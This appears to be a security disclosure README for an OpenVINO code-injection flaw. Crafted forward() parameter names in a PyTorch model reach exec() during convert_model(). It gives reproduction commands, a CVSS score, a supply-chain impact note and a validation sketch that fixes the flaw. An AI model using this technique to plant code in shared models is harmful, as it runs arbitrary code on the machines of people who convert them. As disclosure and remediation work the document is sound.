# OpenVINO Code Injection via exec() PoC — EXEC-VULN-01

## Vulnerability

Code injection in the PyTorch frontend at `src/bindings/python/src/openvino/frontend/pytorch/utils.py:204`.
Model `forward()` parameter names are interpolated into a Python class template and passed to `exec()` without sanitization.
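
The missing check, sketched as an added example (not code from OpenVINO or from this PoC): every parameter name is validated as a plain identifier before it reaches the template and `exec()`. `TEMPLATE`, `RESERVED`, `validate_param_names` and `build_wrapper` are hypothetical names, and the template is a stand-in for the real one.

```python
import keyword

# Hypothetical stand-in for a class template filled with forward() parameter
# names; an assumption for illustration, not OpenVINO's actual template.
TEMPLATE = '''
class Wrapper:
    def __init__(self, model):
        self.model = model

    def forward(self, {signature}):
        return self.model({call_args})
'''

RESERVED = {"self"}  # already used by the template's own signature


def validate_param_names(names):
    """Return the names as a list if every one is a plain, unique identifier."""
    checked = []
    for name in names:
        if not isinstance(name, str) or not name.isidentifier():
            raise ValueError(f"not a Python identifier: {name!r}")
        if keyword.iskeyword(name) or name in RESERVED:
            raise ValueError(f"reserved name: {name!r}")
        if name in checked:
            raise ValueError(f"duplicate name: {name!r}")
        checked.append(name)
    return checked


def build_wrapper(names):
    """Validate first, then fill the template and exec it in a fresh namespace."""
    names = validate_param_names(names)
    source = TEMPLATE.format(
        signature=", ".join(names),
        call_args=", ".join(f"{n}={n}" for n in names),
    )
    namespace = {}
    exec(source, namespace)  # source now contains only vetted identifiers
    return namespace["Wrapper"]


if __name__ == "__main__":
    wrapper_cls = build_wrapper(["input_ids", "attention_mask"])
    print(wrapper_cls(lambda **kw: sorted(kw)).forward(1, 2))
    for constructed in ["a, b", "x=1", "class", ""]:  # constructed bad names
        try:
            build_wrapper([constructed])
        except ValueError as err:
            print("rejected:", err)
```

Rejecting the name outright, rather than escaping it, keeps anything that is not a single identifier token out of the generated source.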

## PoC

`poc_exec_injection.py` creates a PyTorch model with a crafted `forward()` parameter name containing Python code. When `openvino.convert_model()` processes this model, the parameter name is interpolated into the template string and `exec()` runs the injected code.

## Reproduction

```bash
pip install torch openvino
python poc_exec_injection.py
# Creates malicious_model.pt
python -c "
import torch, openvino as ov
model = torch.load('malicious_model.pt')
ov.convert_model(model)
# Injected code executes: id > /tmp/openvino-rce-proof.txt
"
cat /tmp/openvino-rce-proof.txt
# Shows: uid=... output from injected command
```

## Impact

Arbitrary code execution when converting a malicious PyTorch model via `openvino.convert_model()`. Supply chain attack via models published to HuggingFace or shared internally.

## CWE

CWE-94 (Improper Control of Generation of Code)

## CVSS

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H — 8.1